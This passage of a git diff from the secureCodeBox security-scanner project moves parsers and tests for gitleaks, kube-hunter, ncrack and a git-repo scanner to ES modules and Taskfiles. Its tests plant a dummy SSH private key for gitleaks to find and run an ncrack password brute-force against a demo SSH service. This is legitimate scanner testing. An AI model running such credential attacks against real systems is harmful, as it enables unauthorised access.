parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-07-30T12:13:41Z", "full_name": "secureCodeBox/integration-pipeline-jenkins-examples", "id": 142870794, @@ -212,8 +210,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-08-16T08:11:15Z", "full_name": "secureCodeBox/ansible-role-securecodebox-openshift", "id": 144957631, @@ -230,8 +228,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-12-12T15:21:02Z", "full_name": "secureCodeBox/django-DefectDojo", "id": 161506648, @@ -248,8 +246,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-02-18T14:23:57Z", "full_name": "secureCodeBox/scanner-infrastructure-ssh", "id": 171298120, @@ -266,8 +264,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-04-10T09:03:38Z", "full_name": "secureCodeBox/scanner-cms-wpscan", "id": 180543766, @@ -284,8 +282,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-04-10T11:39:04Z", "full_name": "secureCodeBox/ruby-scanner-scaffolding", "id": 180568880, @@ -302,8 +300,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-08-21T13:21:09Z", "full_name": "secureCodeBox/securecodebox.github.io", "id": 203588805, @@ -320,8 +318,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-08-26T14:11:02Z", "full_name": "secureCodeBox/gatsby-gh-pages-action", "id": 204489733, @@ -338,8 +336,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-08-27T12:46:48Z", "full_name": "secureCodeBox/ssh_scan", "id": 204701677, @@ -356,8 +354,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-10-11T11:28:15Z", "full_name": "secureCodeBox/swagger-petstore-openshift", "id": 214418800, @@ -374,8 +372,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-11-19T11:25:21Z", "full_name": "secureCodeBox/nikto", "id": 222679857, @@ -392,8 +390,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2019-11-25T13:34:16Z", "full_name": "secureCodeBox/scanner-infrastructure-ncrack", "id": 223956455, @@ -410,8 +408,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-03-24T14:33:08Z", "full_name": "secureCodeBox/secureCodeBox-v2", "id": 249731346, @@ -428,8 +426,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-03-29T10:40:12Z", "full_name": "secureCodeBox/zap-extensions", "id": 251007807, @@ -446,8 +444,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-07-07T14:14:16Z", "full_name": "secureCodeBox/zaproxy", "id": 277835641, @@ -464,8 +462,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-08-07T17:58:52Z", "full_name": "secureCodeBox/static-export", "id": 285890805, @@ -482,8 +480,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-08-17T15:09:19Z", "full_name": "secureCodeBox/telemetry", "id": 288212154, @@ -500,8 +498,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-09-02T13:39:10Z", "full_name": "secureCodeBox/documentation", "id": 292293538, @@ -518,8 +516,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-09-03T13:08:22Z", "full_name": "secureCodeBox/ui", "id": 292573194, @@ -536,8 +534,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2020-09-28T08:58:53Z", "full_name": "secureCodeBox/internal", "id": 299249650, diff --git a/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py b/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py index c7a8f59ff9..093c0acf97 100644 --- a/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py +++ b/scanners/git-repo-scanner/scanner/git_repo_scanner/__main__.py @@ -6,10 +6,7 @@ import json import logging import sys -from datetime import datetime - -# https://docs.python.org/3/library/datetime.html -from datetime import timedelta +from datetime import datetime, timedelta, timezone from pathlib import Path import github @@ -27,7 +24,7 @@ logging.basicConfig(level=logging.INFO, format=log_format) logger = logging.getLogger("git_repo_scanner") -now_utc = pytz.utc.localize(datetime.utcnow()) +now_utc = datetime.now(timezone.utc) def main(): diff --git a/scanners/gitleaks/Taskfile.yaml b/scanners/gitleaks/Taskfile.yaml new file mode 100644 index 0000000000..8988f3f9fd --- /dev/null +++ b/scanners/gitleaks/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: gitleaks + +tasks: {} diff --git a/scanners/gitleaks/integration-tests/gitleaks.test.js b/scanners/gitleaks/integration-tests/gitleaks.test.js index ba9dbd404e..d99fb4ec36 100644 --- a/scanners/gitleaks/integration-tests/gitleaks.test.js +++ b/scanners/gitleaks/integration-tests/gitleaks.test.js @@ -2,9 +2,8 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(0); +import { time } from "console"; +import { scan } from "../../../tests/integration/helpers.js"; test( "Gitleaks should find one secret in a demo target", @@ -12,30 +11,32 @@ test( const { categories, severities, count } = await scan( "gitleaks-dummy-scan", "gitleaks", - [ - "detect", - "--source", - "/repo/" - ], + ["detect", "--source", "/repo/"], 90, // volumes - [{ - "name": "test-dir", - "emptyDir": {} - }], + [ + { + name: "test-dir", + emptyDir: {}, + }, + ], // volumeMounts - [{ - "mountPath": "/repo/", - "name": "test-dir" - }], + [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], // initContainers - [{ - "name": "init-git", - "image": "bitnami/git", - "command": ["bash", - "-c", - // Bash script to create a git repo with a demo file - `cd /repo && \\ + [ + { + name: "init-git", + image: "bitnami/git", + command: [ + "bash", + "-c", + // Bash script to create a git repo with a demo file + `cd /repo && \\ git init && \\ echo '-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW @@ -47,12 +48,16 @@ vOLRZhe7xrVYy3d0FUmGAAAAFnlvdXJfZW1haWxAZXhhbXBsZS5jb20BAgMEBQYH git config --global user.name test && \\ git config --global user.email user@example.com && \\ git add secret.pem && \\ - git commit -m test`], - "volumeMounts": [{ - "mountPath": "/repo/", - "name": "test-dir" - }] - }] + git commit -m test`, + ], + volumeMounts: [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], + }, + ], ); expect(count).toBe(1); @@ -60,8 +65,10 @@ vOLRZhe7xrVYy3d0FUmGAAAAFnlvdXJfZW1haWxAZXhhbXBsZS5jb20BAgMEBQYH "Potential Secret": 1, }); expect(severities).toEqual({ - medium: 1 + medium: 1, }); }, - 3 * 60 * 1000 -); \ No newline at end of file + { + timeout: 3 * 60 * 1000, + }, +); diff --git a/scanners/gitleaks/parser/Dockerfile b/scanners/gitleaks/parser/Dockerfile index ee2cd5a9d3..159649e6ba 100644 --- a/scanners/gitleaks/parser/Dockerfile +++ b/scanners/gitleaks/parser/Dockerfile @@ -11,7 +11,7 @@ ARG baseImageTag # RUN mkdir -p /home/app # WORKDIR /home/app # COPY package.json package-lock.json ./ -# RUN npm ci --production +# RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/gitleaks/parser/parser.js b/scanners/gitleaks/parser/parser.js index efc0b2cd26..cef4850854 100644 --- a/scanners/gitleaks/parser/parser.js +++ b/scanners/gitleaks/parser/parser.js @@ -2,68 +2,70 @@ // // SPDX-License-Identifier: Apache-2.0 -const HIGH_TAGS = ["HIGH"]; -const LOW_TAGS = ["LOW"]; +const repoUrlAnnotationKey = "metadata.scan.securecodebox.io/git-repo-url"; -const repoUrlAnnotationKey = "metadata.scan.securecodebox.io/git-repo-url" - -async function parse (fileContent, scan) { +export async function parse(fileContent, scan) { + if (!fileContent) { + return []; + } - if (fileContent) { - const commitUrlBase = prepareCommitUrl(scan); + const report = JSON.parse(fileContent); - return fileContent.map(finding => { - - let severity = 'MEDIUM'; - - if (containsTag(finding.Tags, HIGH_TAGS)) { - severity = 'HIGH' - } else if (containsTag(finding.Tags, LOW_TAGS)) { - severity = 'LOW' - } - - return { - name: finding.RuleID, - description: 'The name of the rule which triggered the finding: ' + finding.RuleID, - osi_layer: 'APPLICATION', - severity: severity, - category: 'Potential Secret', - attributes: { - commit: commitUrlBase + finding.Commit, - description: finding.Description, - offender: finding.Secret, - author: finding.Author, - email: finding.Email, - date: finding.Date, - file: finding.File, - line_number: finding.StartLine, - tags: finding.Tags, - line: finding.Match - } - } - }); - } - else - { + if (!report) { return []; } + + const commitUrlBase = prepareCommitUrl(scan); + + return report.map((finding) => { + let severity = "MEDIUM"; + + if (containsTag(finding.Tags, ["HIGH"])) { + severity = "HIGH"; + } else if (containsTag(finding.Tags, ["LOW"])) { + severity = "LOW"; + } + + return { + name: finding.RuleID, + description: + "The name of the rule which triggered the finding: " + finding.RuleID, + osi_layer: "APPLICATION", + severity: severity, + category: "Potential Secret", + attributes: { + commit: commitUrlBase + finding.Commit, + description: finding.Description, + offender: finding.Secret, + author: finding.Author, + email: finding.Email, + date: finding.Date, + file: finding.File, + line_number: finding.StartLine, + tags: finding.Tags, + line: finding.Match, + }, + }; + }); } -function containsTag (tag, tags) { - let result = tags.filter(longTag => tag.includes(longTag)); +function containsTag(tag, tags) { + let result = tags.filter((longTag) => tag.includes(longTag)); return result.length > 0; } -function prepareCommitUrl (scan) { - if (!scan || !scan.metadata.annotations || !scan.metadata.annotations[repoUrlAnnotationKey]) { - return ''; +function prepareCommitUrl(scan) { + if ( + !scan || + !scan.metadata.annotations || + !scan.metadata.annotations[repoUrlAnnotationKey] + ) { + return ""; } var repositoryUrl = scan.metadata.annotations[repoUrlAnnotationKey]; - return repositoryUrl.endsWith('/') ? - repositoryUrl + 'commit/' - : repositoryUrl + '/commit/' + return repositoryUrl.endsWith("/") + ? repositoryUrl + "commit/" + : repositoryUrl + "/commit/"; } - -module.exports.parse = parse; diff --git a/scanners/gitleaks/parser/parser.test.js b/scanners/gitleaks/parser/parser.test.js index 7c319e3a76..fd83d8f03b 100644 --- a/scanners/gitleaks/parser/parser.test.js +++ b/scanners/gitleaks/parser/parser.test.js @@ -2,21 +2,19 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse empty gitleaks json file", async () => { const jsonContent = await readFile( __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchObject([]); }); @@ -26,9 +24,9 @@ test("should properly parse gitleaks json file with null result", async () => { __dirname + "/__testFiles__/test-null-report.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchObject([]); }); @@ -38,9 +36,9 @@ test("should properly parse gitleaks json file", async () => { __dirname + "/__testFiles__/test-report.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` [ @@ -131,9 +129,9 @@ test("should define severity based on tags in result file", async () => { __dirname + "/__testFiles__/test-report-tags.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -221,9 +219,9 @@ test("should properly construct commit URL if given in scan annotation without t __dirname + "/__testFiles__/test-report.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent), scan); + const findings = await parse(jsonContent, scan); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -328,9 +326,9 @@ test("should properly construct commit URL if given in scan annotation with trai __dirname + "/__testFiles__/test-report.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent), scan); + const findings = await parse(jsonContent, scan); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -415,4 +413,4 @@ test("should properly construct commit URL if given in scan annotation with trai }, ] `); -}); \ No newline at end of file +}); diff --git a/scanners/kube-hunter/Makefile b/scanners/kube-hunter/Makefile deleted file mode 100644 index a539cda6db..0000000000 --- a/scanners/kube-hunter/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = kube-hunter -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/kube-hunter/Taskfile.yaml b/scanners/kube-hunter/Taskfile.yaml new file mode 100644 index 0000000000..cee4e0e134 --- /dev/null +++ b/scanners/kube-hunter/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: kube-hunter + +tasks: {} diff --git a/scanners/kube-hunter/integration-tests/kube-hunter.test.js b/scanners/kube-hunter/integration-tests/kube-hunter.test.js index cfa1931c8d..fab7d3eeb1 100644 --- a/scanners/kube-hunter/integration-tests/kube-hunter.test.js +++ b/scanners/kube-hunter/integration-tests/kube-hunter.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "kube-hunter should find a fixed number of findings for the kind cluster", @@ -13,12 +11,12 @@ test( "kube-hunter-in-cluster", "kube-hunter", ["--pod", "--quick"], - 4 * 60 + 4 * 60, ); // If we got here the scan succeeded // as the number of findings will depend on the cluster, we just check if it is defined at all expect(true).toBe(true); }, - 5 * 60 * 1000 + { timeout: 5 * 60 * 1000 }, ); diff --git a/scanners/kube-hunter/parser/parser.js b/scanners/kube-hunter/parser/parser.js index 7ecd6baa04..4381bb1b05 100644 --- a/scanners/kube-hunter/parser/parser.js +++ b/scanners/kube-hunter/parser/parser.js @@ -2,24 +2,24 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse({ vulnerabilities = [], nodes = [] }) { - return vulnerabilities.map(vulnerability => { - const reference = {} +export async function parse({ vulnerabilities = [], nodes = [] }) { + return vulnerabilities.map((vulnerability) => { + const reference = {}; - if ( vulnerability.vid !== "None") { - reference.id = vulnerability.vid - reference.source = `https://aquasecurity.github.io/kube-hunter/kb/${vulnerability.vid}` + if (vulnerability.vid !== "None") { + reference.id = vulnerability.vid; + reference.source = `https://aquasecurity.github.io/kube-hunter/kb/${vulnerability.vid}`; } let location = vulnerability.location; - if (location.startsWith('Local to Pod')) { + if (location.startsWith("Local to Pod")) { // This is a pod specific vulnerability. // As this does not fit the secureCodeBox model to well we will scope this to the first "Node/Master" type node of the cluster. // This is subject to change. for (const node of nodes) { if (node.type === "Node/Master") { - location = node.location + location = node.location; break; } } @@ -35,13 +35,11 @@ async function parse({ vulnerabilities = [], nodes = [] }) { attributes: { evidence: vulnerability.evidence, kubeHunterRule: vulnerability.hunter, - } + }, }; }); } -function toValidUrl(location){ - return "tcp://"+location +function toValidUrl(location) { + return "tcp://" + location; } - -module.exports.parse = parse; diff --git a/scanners/kube-hunter/parser/parser.test.js b/scanners/kube-hunter/parser/parser.test.js index 1fa447caef..9cddcab818 100644 --- a/scanners/kube-hunter/parser/parser.test.js +++ b/scanners/kube-hunter/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("parses result from kind-1.18-in-cluster-scan correctly", async () => { const fileContent = JSON.parse( @@ -15,8 +13,8 @@ test("parses result from kind-1.18-in-cluster-scan correctly", async () => { __dirname + "/__testFiles__/kind-1.18-in-cluster-scan.json", { encoding: "utf8", - } - ) + }, + ), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -28,7 +26,7 @@ test("should properly parse empty kube-hunter json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/ncrack/Makefile b/scanners/ncrack/Makefile deleted file mode 100644 index 00c679da3d..0000000000 --- a/scanners/ncrack/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = ncrack -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-dummy-ssh diff --git a/scanners/ncrack/Taskfile.yaml b/scanners/ncrack/Taskfile.yaml new file mode 100644 index 0000000000..832eab3ea0 --- /dev/null +++ b/scanners/ncrack/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: ncrack + +tasks: + predeploy: + deps: + - demo-targets:deploy:dummy-ssh + cmds: [] diff --git a/scanners/ncrack/integration-tests/ncrack.test.js b/scanners/ncrack/integration-tests/ncrack.test.js index 34a5c73021..825fe6e112 100644 --- a/scanners/ncrack/integration-tests/ncrack.test.js +++ b/scanners/ncrack/integration-tests/ncrack.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "ncrack should find 1 credential in vulnerable ssh service", @@ -18,7 +16,7 @@ test( "--pass=THEPASSWORDYOUCREATED,12345", "ssh://dummy-ssh.demo-targets.svc", ], - 90 + 90, ); expect(count).toBe(1); @@ -29,5 +27,5 @@ test( high: 1, }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/ncrack/parser/Dockerfile b/scanners/ncrack/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/ncrack/parser/Dockerfile +++ b/scanners/ncrack/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/ncrack/parser/package-lock.json b/scanners/ncrack/parser/package-lock.json index 2c2e1361dd..db99125f55 100644 --- a/scanners/ncrack/parser/package-lock.json +++ b/scanners/ncrack/parser/package-lock.json @@ -9,7 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.6.0" + "xml2js": "^0.6.2" }, "devDependencies": {} }, @@ -19,9 +19,10 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "node_modules/xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "license": "MIT", "dependencies": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" @@ -46,9 +47,9 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", "requires": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" diff --git a/scanners/ncrack/parser/package.json b/scanners/ncrack/parser/package.json index 6aa8738fce..be584ac7cf 100644 --- a/scanners/ncrack/parser/package.json +++ b/scanners/ncrack/parser/package.json @@ -8,7 +8,7 @@ "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.6.0" + "xml2js": "^0.6.2" }, "devDependencies": {} -} +} \ No newline at end of file diff --git a/scanners/ncrack/parser/parser.js b/scanners/ncrack/parser/parser.js index c7fb7f0fa6..2d98d28194 100644 --- a/scanners/ncrack/parser/parser.js +++ b/scanners/ncrack/parser/parser.js @@ -2,21 +2,22 @@ // // SPDX-License-Identifier: Apache-2.0 -const xml2js = require("xml2js"); -const crypto = require("crypto"); -const {readFile} = require("fs/promises"); +import { parseString } from "xml2js"; +import { publicEncrypt, constants } from "node:crypto"; +import { readFile } from "node:fs/promises"; -async function parse( +export async function parse( fileContent, scan, - encryptionKeyLocation = process.env["ENCRYPTION_KEY_LOCATION"] + encryptionKeyLocation = process.env["ENCRYPTION_KEY_LOCATION"], ) { - const {ncrackrun} = await transformXML(fileContent); + const { ncrackrun } = await transformXML(fileContent); let publicKey = null; if (encryptionKeyLocation) { publicKey = await readPublicKey(encryptionKeyLocation).catch(() => { console.log( - "Public key not found on file system location: " + encryptionKeyLocation + "Public key not found on file system location: " + + encryptionKeyLocation, ); process.exit(); }); @@ -25,23 +26,21 @@ async function parse( } function transformToFindings(ncrackrun, publicKey) { - return ncrackrun.service.flatMap(({address, port, credentials = []}) => { - const {addr: ipAddress} = address[0]["$"]; - const {protocol, portid, name: portName} = port[0]["$"]; + return ncrackrun.service.flatMap(({ address, port, credentials = [] }) => { + const { addr: ipAddress } = address[0]["$"]; + const { protocol, portid, name: portName } = port[0]["$"]; return credentials.map((credential) => { - let {username, password} = credential["$"]; + let { username, password } = credential["$"]; if (publicKey) { - password = crypto - .publicEncrypt( - { - key: publicKey, - padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, - }, - Buffer.from(password) - ) - .toString("base64"); + password = publicEncrypt( + { + key: publicKey, + padding: constants.RSA_PKCS1_OAEP_PADDING, + }, + Buffer.from(password), + ).toString("base64"); } return { @@ -69,7 +68,7 @@ function transformToFindings(ncrackrun, publicKey) { function transformXML(fileContent) { return new Promise((resolve, reject) => { - xml2js.parseString(fileContent, (err, xmlInput) => { + parseString(fileContent, (err, xmlInput) => { if (err) { reject(new Error("Error converting XML to JSON in xml2js: " + err)); } else { @@ -82,5 +81,3 @@ function transformXML(fileContent) { async function readPublicKey(keyLocation) { return readFile(keyLocation); } - -module.exports.parse = parse; diff --git a/scanners/ncrack/parser/parser.test.js b/scanners/ncrack/parser/parser.test.js index e2b1af8dcb..aaf7006d78 100644 --- a/scanners/ncrack/parser/parser.test.js +++ b/scanners/ncrack/parser/parser.test.js @@ -2,20 +2,18 @@ // // SPDX-License-Identifier: Apache-2.0 -const {parse} = require("./parser"); -const fs = require("fs"); -const crypto = require("crypto"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFileSync } from "node:fs"; +import { privateDecrypt, constants } from "node:crypto"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; + +import { parse } from "./parser"; it("should return no findings when ncrack has not found credentials", async () => { - // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_no_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -24,11 +22,11 @@ it("should return no findings when ncrack has not found credentials", async () = it("should return findings when ncrack found credentials", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_with_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -59,11 +57,11 @@ it("should return findings when ncrack found credentials", async () => { it("should return no findings when ncrack has not found credentials scanning two services", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_two_services_no_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -73,11 +71,11 @@ it("should return no findings when ncrack has not found credentials scanning two it("should return findings when ncrack found two credentials scanning two services", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_two_services_with_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -127,24 +125,24 @@ it("should return findings when ncrack found two credentials scanning two servic it("should encrypt findings when a public key is set", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_with_results.xml", { encoding: "utf8", - } + }, ); const [finding] = await parse( ncrackXML, null, - __dirname + "/__testFiles__/public_key.pem" + __dirname + "/__testFiles__/public_key.pem", ); - let decryptedData = crypto.privateDecrypt( + let decryptedData = privateDecrypt( { key: privateKey, - padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, + padding: constants.RSA_PKCS1_OAEP_PADDING, }, - Buffer.from(finding.attributes.password, "base64") + Buffer.from(finding.attributes.password, "base64"), ); expect(finding.attributes.password.length).toBe(172); diff --git a/scanners/ncrack/scanner/Dockerfile b/scanners/ncrack/scanner/Dockerfile index 5dd84fe235..991912dc24 100644 --- a/scanners/ncrack/scanner/Dockerfile +++ b/scanners/ncrack/scanner/Dockerfile @@ -12,4 +12,3 @@ RUN groupadd -g 1001 ncrack \ && useradd -M -u 1001 -g 1001 ncrack USER 1001 CMD [ "ncrack" ] - diff --git a/scanners/nikto/Makefile 